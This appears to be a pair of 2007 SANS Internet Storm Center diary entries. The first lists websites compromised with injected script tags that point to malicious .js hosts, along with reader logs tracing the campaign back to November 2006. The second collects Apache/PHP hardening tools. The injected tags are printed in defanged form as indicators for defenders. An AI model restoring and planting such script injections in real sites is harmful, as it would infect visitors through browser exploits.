Super Bowl Infection - More Sites
On Friday we reported that the Dolphins Stadium (home of the 2007 Super Bowl) was infected with a scripted pointer to malware that exploited two patchable Microsoft Windows vulnerabilities. While doing research on that issue we uncovered many more sites that contain similar references. Here is a list of the some of the ones we found, many have already been cleaned up but many have not. System administrators might want to check their network flow logs for any traffic to these sites, and for any traffic to the five sites that hosted the hostile Java script.
It looks like the "1.js" intrusions happened around the first of January while the "3.js" intrusions occured near the end of January. We cannot find any evidence of a "2.js" or "4.js" script. In the references below, I changed the word "script" to "skript" in order to prevent any accidental mis-fires.
<skript src="http://w1c.cn/3.js"></skript>
www.nlgaming.com
www.arcchart.com
<skript src="http://dv521.com/3.js"></skript>
[multiple_sub_domains].squizzle.com
www.offshore247.com
mhmonline.com
www.citruscollege.edu
www.stariq.com
www2a.cdc.gov
www.surfersvillage.com
www.citrus.cc.ca.us
207.178.138.47
<skript src="http://bc0.cn/3.js"></skript>
https://www.massgeneral.org
<skript src="http://bc0.cn/1.js"></skript>
www.me-uk.com
www.olympusamerica.com
www.cabi-publishing.org
www.imo.org
www.pathnet.org
www.vcuhealth.org
www.medcompare.com
ymghealthinfo.org
www.zeenews.com
www.pharmabrandeurope.com
www.infogrip.com
totallydrivers.com
www.ajr.org
www.offshore247.com
www.massgeneral.org
www.nlgaming.com
www.speroforum.com
www.betterpropaganda.com
www.youandaids.org
www.cottagesdirect.com
www.plasticsmag.com
www.healthy.net
www.irinnews.org
www.pubapps.vcu.edu
www.generousgiving.org
www.doctorndtv.com
www.mcv.org
www.vcuhs.org
www.nordic-telecom.com
www.betterpropaganda.com
www.nationalmssociety.org
www.nmss.org
cityofboston.gov
<skript src="http://137wg.com/1.js"></skript>
wanniski.com
www.wilson.edu
A common theme seems to be an attack on hospital or medical care sites, although that is not completely the case. We checked to see if this was a mass attack on one service provider but other than a lot of *.squizzle.com sites it does not appear to be this type of attack.
[UPDATE 5 Feb 07 1754Z]
A reader sent us this:
I think the 1.js problem goes back a bit further in time. I found these logs:
Fri Dec 1 10:08:44 2006: x.x.x.x -> 220.162.244.78: 54995 -> 80 GET /1.js HTTP/1.0 (bc0.cn)
Wed Dec 6 11:42:05 2006: x.x.x.x -> 220.162.244.78: 55089 -> 80 GET /1.js HTTP/1.0 (bc0.cn)
Mon Dec 11 14:17:04 2006: x.x.x.x -> 220.162.244.78: 51732 -> 80 GET /1.js HTTP/1.0 (bc0.cn)
Thu Dec 21 12:17:55 2006: x.x.x.x -> 220.162.244.78: 48628 -> 80 GET /1.js HTTP/1.0 (bc0.cn)
...which makes us curious as to when this incident started. If you could check your logs and let us know about detections prior to December 1st 2006 we would greatly appreciate it. We'll post an update here later today or tonight.
[UPDATE 5 Feb 07 2032Z]
More logs were sent to us showing activity as far back as mid-November. Note the swing from 137wg.com to bc0.com to dv521.com (the site that was involved in the Dolphins Stadium incident):
Mon Nov 13 09:09:11 2006: x.x.x.x -> 61.153.58.189: 60413 -> 80 GET /1.js HTTP/1.0 (137wg.com)
Mon Nov 20 12:24:20 2006: x.x.x.x -> 61.153.58.189: 44057 -> 80 GET /1.js HTTP/1.0 (137wg.com)
Tue Nov 21 10:10:35 2006: x.x.x.x -> 61.153.58.189: 63269 -> 80 GET /1.js HTTP/1.0 (newasp.com.cn)
Fri Dec 1 10:08:44 2006: x.x.x.x -> 220.162.244.78: 54995 -> 80 GET /1.js HTTP/1.0 (bc0.cn)
Wed Dec 6 11:42:05 2006: x.x.x.x -> 220.162.244.78: 55089 -> 80 GET /1.js HTTP/1.0 (bc0.cn)
Mon Dec 11 14:17:04 2006: x.x.x.x -> 220.162.244.78: 51732 -> 80 GET /1.js HTTP/1.0 (bc0.cn)
Thu Dec 21 12:17:55 2006: x.x.x.x -> 220.162.244.78: 48628 -> 80 GET /1.js HTTP/1.0 (bc0.cn)
Thu Jan 4 16:02:18 2007: x.x.x.x -> 220.162.244.78: 34430 -> 80 GET /1.js HTTP/1.0 (bc0.cn)
Thu Jan 11 10:49:50 2007: x.x.x.x -> 205.209.132.142: 51012 -> 80 GET /1.js HTTP/1.0 (bc0.cn)
Thu Jan 11 11:07:05 2007: x.x.x.x -> 205.209.132.142: 36520 -> 80 GET /1.js HTTP/1.0 (bc0.cn)
Thu Jan 18 16:30:57 2007: x.x.x.x -> 205.209.132.142: 46649 -> 80 GET /1.js HTTP/1.0 (bc0.cn)
Sat Jan 20 12:47:03 2007: x.x.x.x -> 205.209.132.142: 39281 -> 80 GET /1.js HTTP/1.0 (bc0.cn)
Wed Jan 31 12:47:58 2007: x.x.x.x -> 205.209.141.146: 63679 -> 80 GET /3.js HTTP/1.0 (dv521.com)
Marcus H. Sachs
Director, SANS Internet Storm Center
Securing Apache/PHP
Nathan wrote in earlier with attempts to exploit PHP file inclusion that his server had automatically thwarted. He's promoting the use of mod_security, mod_evasive, fail2ban and suhosin in a Apache/PHP environment.
Since knowledge and experience is a way to win from the bad guys, how about sharing your favorite setup for Apache/PHP security (Basically a "LAMP" environment although I'd rather not focus on the OS part in there) and we'll summarize on this page. Also let us know what you like of the components you use, why they are your favorite etc.
mod_security
mod_security works inside the web server and gives many features you could expect from a intrusion prevention perspective if combined with the free core rules.
mod_evasive
http://www.zdziarski.com/projects/mod_evasive/
mod_evasive is a tool that evades DDoS and brute force attacks. It only works within every single instance of the httpd and as such should be safe for proxies and NAT-ed visitors. See also httpd-guardian in the Apache Security Tools.
fail2ban
Nathan used this tool to ban IP addresses doing repeated 404/501 error results. He catches attempts to hack forums based on PHP this way, and was able to trace it back to owned servers doing those attacks towards him.
suhosin
http://www.hardened-php.net/suhosin.127.html
Suhosin works more directly on the PHP engine itself, see the feature list.
Apache Security Tools
http://www.apachesecurity.net/tools/
Ivan Ristic has a collection of tools for monitoring and securing apache, check them out.
Secure Apache/PHP settings
- We had diaries on this subject before.
- Ivan Ristic has a chapter of his Apache Security book online.
- CISecurity's Apache benchmark: http://www.cisecurity.org/tools2/apache/CIS_Apache_Benchmark_v1.6.pdf
- NIST publication 800-44 (dated 2002 and wider than Apache alone)
I want to thank Ryan and Nathan as well as fellow handlers for the discussions.
--
Swa Frantzen -- net2s.com
Comments